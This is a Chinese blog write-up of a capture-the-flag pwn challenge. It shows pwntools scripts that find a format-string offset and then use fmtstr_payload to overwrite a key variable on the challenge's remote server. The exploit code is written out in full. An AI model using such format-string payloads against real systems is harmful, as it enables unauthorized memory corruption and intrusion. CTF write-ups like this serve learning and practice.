[攻防世界 pwn]——实时数据监测

博客围绕攻防世界pwn的实时数据监测题目展开。给出题目地址,提到在ida中操作,需将key值修改为35795746,通过写脚本在pwndbg中确定偏移位为12,还给出了利用fmtstr_payload的exploit。

[攻防世界 pwn]——实时数据监测

checksec就不说了,没什么

ida中
在这里插入图片描述
只要将key里面的值修改为35795746,就好

写个小脚本在pwndbg中看看偏移

from pwn import *
p = process('./pwn')
gdb.attach(p, 'b *0x080484A7')
#p = remote("111.200.241.244",48715)
key_addr = 0x0804A048
payload = 'aaaa%4$s'
p.sendline(payload)
p.interactive()

发现偏移位12,距离输入
在这里插入图片描述
所以,exploit如下,fmtstr_payload是pwntools集成的模板,对于第一个参数是offest(偏移),后面是地址,和地址中写入的值。

exploit

from pwn import *
#p = process('./pwn')
#gdb.attach(p, 'b *0x080484A7')
p = remote("111.200.241.244",48715)
key_addr = 0x0804A048
payload = fmtstr_payload(12,{key_addr:35795746})
p.sendline(payload)
p.interactive()
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值